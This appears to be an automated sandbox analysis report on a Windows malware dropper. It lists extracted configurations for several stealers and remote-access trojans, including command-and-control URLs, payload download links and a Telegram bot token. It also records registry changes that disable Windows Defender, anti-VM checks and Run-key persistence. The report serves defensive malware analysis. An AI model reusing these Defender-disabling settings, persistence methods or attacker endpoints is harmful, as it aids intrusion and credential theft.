Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-01-2025 16:01
Static task
static1
Behavioral task
behavioral1
Sample
f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe
Resource
win10v2004-20241007-en
General
-
Target
f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe
-
Size
1.8MB
-
MD5
79313fd19b4d3a947a4a5bb6d8a3e719
-
SHA1
f89d8fd59723ca8e433fd10a69c12f1da208d69d
-
SHA256
f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40
-
SHA512
35cdfe95ca8c7a8e51a636dcd1fdad96d319b933171d75df30dd52ff3f1b8720d6e1bacf6ca4352a7310b1711d111fe2da322e7a3a85f33fcaa42e8c79a62142
-
SSDEEP
49152:IonQDVTFz3+dBKJCLKwVP9fcaGrGZ2nePhUC/SdcY6NSesH:/Q9tjJCGwVF0aGCZ2enty
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
xworm
5.0
91.212.166.99:4404
f35pmRFzPiiasEf1
-
Install_directory
%LocalAppData%
-
install_file
dllhost.exe
Extracted
vidar
https://t.me/sc1phell
https://steamcommunity.com/profiles/76561199819539662
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0
Extracted
asyncrat
0.5.8
Default
159.100.19.137:7707
yBu0GW2G5zAc
-
delay
3
-
install
false
-
install_file
svchost.exe
-
install_folder
%AppData%
Extracted
lumma
https://cloudewahsj.shop/api
https://rabidcowse.shop/api
https://noisycuttej.shop/api
https://tirepublicerj.shop/api
https://framekgirus.shop/api
https://wholersorie.shop/api
https://abruptyopsn.shop/api
https://nearycrepso.shop/api
Extracted
stealc
brat
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
lumma
https://toppyneedus.biz/api
Extracted
gurcu
https://api.telegram.org/bot7796466207:AAFr4eJop5lV1qGyhuFlMc4hIV2ErcSZ_4E/sendMessag
Signatures
-
Amadey family
-
Asyncrat family
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral2/memory/1480-852-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1480-850-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 behavioral2/memory/1480-849-0x0000000000400000-0x0000000000422000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/948-197-0x0000000002AB0000-0x0000000002AC0000-memory.dmp family_xworm -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/4028-915-0x0000000000860000-0x0000000000B10000-memory.dmp healer behavioral2/memory/4028-916-0x0000000000860000-0x0000000000B10000-memory.dmp healer behavioral2/memory/4028-990-0x0000000000860000-0x0000000000B10000-memory.dmp healer -
Gurcu family
-
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE -
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Netsupport family
-
Stealc family
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral2/memory/948-766-0x000000001DB10000-0x000000001DC30000-memory.dmp family_stormkitty -
Stormkitty family
-
Vidar family
-
Xworm family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF fdd227d667.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 32c0c97ccb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ df2fa3eeb4.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9ebca9cb64.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ jonbDes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ client32.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ b226bb76a2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1400d853a7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fdd227d667.exe -
Blocklisted process makes network request 8 IoCs
flow pid Process 56 3540 powershell.exe 58 3540 powershell.exe 100 3540 powershell.exe 101 3740 powershell.exe 146 2912 powershell.exe 150 2912 powershell.exe 151 3532 powershell.exe 175 2912 powershell.exe -
pid Process 2624 powershell.exe 2440 powershell.exe 1940 powershell.exe 1480 powershell.exe 3740 powershell.exe 4724 powershell.exe 2912 powershell.exe 3532 powershell.exe 1256 powershell.exe 3540 powershell.exe 5096 powershell.exe 3512 powershell.exe 1480 powershell.exe -
Downloads MZ/PE file 19 IoCs
flow pid Process 94 980 skotes.exe 94 980 skotes.exe 94 980 skotes.exe 94 980 skotes.exe 101 3740 powershell.exe 151 3532 powershell.exe 16 980 skotes.exe 16 980 skotes.exe 16 980 skotes.exe 16 980 skotes.exe 16 980 skotes.exe 16 980 skotes.exe 16 980 skotes.exe 16 980 skotes.exe 16 980 skotes.exe 16 980 skotes.exe 16 980 skotes.exe 16 980 skotes.exe 16 980 skotes.exe -
Checks BIOS information in registry 2 TTPs 28 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1400d853a7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion df2fa3eeb4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b226bb76a2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fdd227d667.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1400d853a7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9ebca9cb64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jonbDes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion client32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jonbDes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion df2fa3eeb4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 32c0c97ccb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b226bb76a2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9ebca9cb64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fdd227d667.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion client32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 32c0c97ccb.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation d1253bb531.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation IJWSn6z.tmp Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation tYrnx75.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onedrive.lnk driver3.exe -
Executes dropped EXE 33 IoCs
pid Process 980 skotes.exe 4264 13Z5sqy.exe 2776 jonbDes.exe 1160 fok8xWd.exe 3732 IJWSn6z.exe 4976 IJWSn6z.tmp 2732 IJWSn6z.exe 672 IJWSn6z.tmp 2276 mH0mZDF.exe 4236 tYrnx75.exe 3744 UmN1TJS.exe 2560 Macromedia.com 4960 skotes.exe 772 dllhost.exe 4444 LCESjzR.exe 3272 LCESjzR.tmp 5044 driver3.exe 4200 a19ddbcf22.exe 3732 1400d853a7.exe 4028 TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE 4140 2cbf0a74ae.exe 4644 483d2fa8a0d53818306efeb32d3.exe 4360 fdd227d667.exe 1920 client32.exe 4660 0f7cec18a3.exe 3832 skotes.exe 4504 dllhost.exe 4288 df2fa3eeb4.exe 628 32c0c97ccb.exe 3064 d1253bb531.exe 1028 b226bb76a2.exe 2460 Macromedia.com 1172 9ebca9cb64.exe -
Identifies Wine through registry keys 2 TTPs 13 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 32c0c97ccb.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 9ebca9cb64.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine jonbDes.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 1400d853a7.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine fdd227d667.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine df2fa3eeb4.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe Key opened \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Wine b226bb76a2.exe -
Loads dropped DLL 12 IoCs
pid Process 4976 IJWSn6z.tmp 4976 IJWSn6z.tmp 672 IJWSn6z.tmp 672 IJWSn6z.tmp 844 regsvr32.exe 948 regsvr32.exe 3736 regsvr32.EXE 1920 client32.exe 1920 client32.exe 1920 client32.exe 1920 client32.exe 1920 client32.exe -
resource yara_rule behavioral2/memory/1920-1074-0x0000000011000000-0x0000000011B4F000-memory.dmp themida behavioral2/memory/1920-1076-0x0000000011000000-0x0000000011B4F000-memory.dmp themida behavioral2/memory/1920-1078-0x0000000011000000-0x0000000011B4F000-memory.dmp themida behavioral2/memory/1920-1079-0x0000000011000000-0x0000000011B4F000-memory.dmp themida behavioral2/memory/1920-1077-0x0000000011000000-0x0000000011B4F000-memory.dmp themida behavioral2/memory/1920-1093-0x0000000011000000-0x0000000011B4F000-memory.dmp themida behavioral2/memory/1920-1094-0x0000000011000000-0x0000000011B4F000-memory.dmp themida -
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a19ddbcf22.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1052869101\\a19ddbcf22.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1052870021\\am_no.cmd" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" 2cbf0a74ae.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b226bb76a2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1052901001\\b226bb76a2.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\9ebca9cb64.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1052902001\\9ebca9cb64.exe" skotes.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" UmN1TJS.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA client32.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 55 bitbucket.org 56 bitbucket.org 95 raw.githubusercontent.com 97 raw.githubusercontent.com 146 bitbucket.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 59 ip-api.com -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023cd1-750.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 4216 tasklist.exe 316 tasklist.exe 4852 tasklist.exe 4692 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
pid Process 3004 f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe 980 skotes.exe 2776 jonbDes.exe 4960 skotes.exe 3732 1400d853a7.exe 4028 TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE 4644 483d2fa8a0d53818306efeb32d3.exe 4360 fdd227d667.exe 1920 client32.exe 3832 skotes.exe 4288 df2fa3eeb4.exe 628 32c0c97ccb.exe 1028 b226bb76a2.exe 1172 9ebca9cb64.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 4264 set thread context of 3788 4264 13Z5sqy.exe 122 PID 2276 set thread context of 4016 2276 mH0mZDF.exe 147 PID 3540 set thread context of 1480 3540 powershell.exe 165 PID 2912 set thread context of 3988 2912 powershell.exe 195 PID 4660 set thread context of 2424 4660 0f7cec18a3.exe 218 -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\SchedulesAb tYrnx75.exe File opened for modification C:\Windows\TokenDetroit tYrnx75.exe File created C:\Windows\Tasks\skotes.job f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe File opened for modification C:\Windows\ContainsBefore tYrnx75.exe File opened for modification C:\Windows\AttacksContacted tYrnx75.exe File opened for modification C:\Windows\SchedulesAb d1253bb531.exe File opened for modification C:\Windows\ContainsBefore d1253bb531.exe File opened for modification C:\Windows\TokenDetroit d1253bb531.exe File opened for modification C:\Windows\AttacksContacted d1253bb531.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LCESjzR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language df2fa3eeb4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fok8xWd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fdd227d667.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1400d853a7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IJWSn6z.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language LCESjzR.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IJWSn6z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Macromedia.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 32c0c97ccb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mH0mZDF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a19ddbcf22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 13Z5sqy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tYrnx75.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jonbDes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IJWSn6z.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f6b00751ddca425327e897c5d8feaef94cac53fb2880610e130798597b799d40.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IJWSn6z.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempPENOY35XVL6F9HKG5A0IXVPRV9VGR5AS.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0f7cec18a3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4884 timeout.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4552 schtasks.exe 1192 schtasks.exe 852 schtasks.exe 2056 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 948 regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
